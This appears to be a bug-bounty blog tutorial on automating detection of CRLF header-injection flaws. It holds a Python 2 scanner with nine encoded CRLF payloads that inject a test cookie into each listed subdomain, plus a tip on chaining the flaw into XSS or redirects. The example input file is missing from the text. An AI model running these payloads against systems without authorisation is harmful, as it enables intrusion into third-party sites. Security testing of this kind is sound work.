Easy Python script to find top-level CRLF bugs.
Automating CRLF Bugs
CRLF is easily detectable because of its ability to set response headers. Detection is as easy as attempting to exploit a web server, and then checking for your unique headers in the response. Let’s look at the steps we will take.
- Get full URL of service to test
- Add payload at the end of URL
- Send GET request to this modified URL
- Check for our header in the response code
- Go to step 2 until we have tried all of our payloads
In order to find good payloads I looked at openly disclosed bug bounty reports and used all of the unique payloads that I found.
Assuming the company subdomains are in a text file the code to automate this will look like the following:
import requests # should create Set-Cookie:mycookie=myvalue header if vulnerable PAYLOADS = [r"%0D%0ASet-Cookie:mycookie=myvalue", r"%0d%0aSet-Cookie:mycookie=myvalue", r"crlf%0dSet-Cookie:mycookie=myvalue", r"crlf%0aSet-Cookie:mycookie=myvalue", r"%23%0dSet-Cookie:mycookie=myvalue", r"%0dSet-Cookie:mycookie=myvalue", r"%0ASet-Cookie:mycookie=myvalue?foo", r"%0aSet-Cookie:mycookie=myvalue", r"/xxx%0ASet-Cookie:mycookie=myvalue;"] # protocol either 'http://' or 'https://' def crlf(protocol, subdomain): for payload in PAYLOADS: try: r = requests.get("%s%s/%s" % (protocol, subdomain, payload), verify=False, timeout=.5, allow_redirects=False) for name in r.cookies.keys(): if "mycookie" in name: print "[+] Vulnerable: %s%s/%s" % (protocol, subdomain, payload) except requests.Timeout: print "\tTimeout" return False except Exception as e: print "ERROR STRING: %s%s:8443/%s" % (protocol, subdomain, payload) print str(e) if __name__ == "__main__": with open("bug_bounty.txt", "r") as f: for subdomain in f: crlf("https://", subdomain)
This code will work on a text file called “bug_bounty.txt” that is in the same directory as it. The text file needs to be formatted as having one subdomain per line. For instance, a valid text file would look like the following:
Then, the code will attempt to exploit each subdomain by appending the appropriate protocol (https or http) by specifying it under the main definition, modify it yourself to try HTTP instead of HTTPS.
You might be lucky to get paid just for this bug, but usually it doesn’t pay. You can turn it into a chained vulnerability if you can locate a cookie being accessed insecurely. Then, you can set that cookie to your payload and then nagivate to the other page to have XSS or URL redirection fire.
Good luck hunting!